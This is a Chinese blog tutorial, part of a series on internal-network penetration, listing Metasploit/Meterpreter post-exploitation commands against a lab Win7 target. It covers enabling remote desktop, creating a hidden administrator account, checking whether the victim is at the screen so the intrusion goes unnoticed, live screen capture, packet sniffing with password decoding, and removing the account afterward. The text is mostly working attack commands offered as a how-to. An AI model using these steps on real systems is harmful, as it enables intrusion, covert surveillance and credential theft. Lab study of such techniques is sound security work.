内网渗透之内网信息收集(二)

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

Metasploit内网信息收集

05打开并连接3389

06数据包抓取

内网渗透之内网信息收集(三)_不知名白帽的博客-CSDN博客


Metasploit内网信息收集

攻击机 kali 192.168.0.103

靶机 win7 192.168.0.105

05打开并连接3389

查看3389端口的开放情况

开启3389远程桌面

run post/windows/manage/enable_rdp

run getgui -e

可以利用该命令在目标机器上添加用户:

run getgui -u admin -p Admin@123456(一些系统密码得满足复杂度才能创建)

net localgroup administrators admin /add(将admin用户添加到管理员组)

远程连接桌面

rdesktop -u username -p password ip

yes之后会弹出一个GUI页面(如果用户没有添加到管理员组不能进行登录)

登陆后会提示关闭win7(所以要提前观察靶机是否有人使用,以免被用户察觉到被攻击)

查看远程桌面

screenshot(截取win7当前屏幕,检查是否有人使用)

use espia

screengrab

screenshare(实时获取win7屏幕,类似于视频样式在浏览器中打开)

删除指定账号

run post/windows/manage/delete_user USERNAME=admin

06数据包抓取

抓包

Load sniffer

Sniffer_interfaces

Sniffer_start 2

Sniffer_dump 2 1.cap

解码

Use auxiliary/sniffer/psnuffle

Set PCAPFILE 1.cap

exploit

  • 18
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知名白帽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值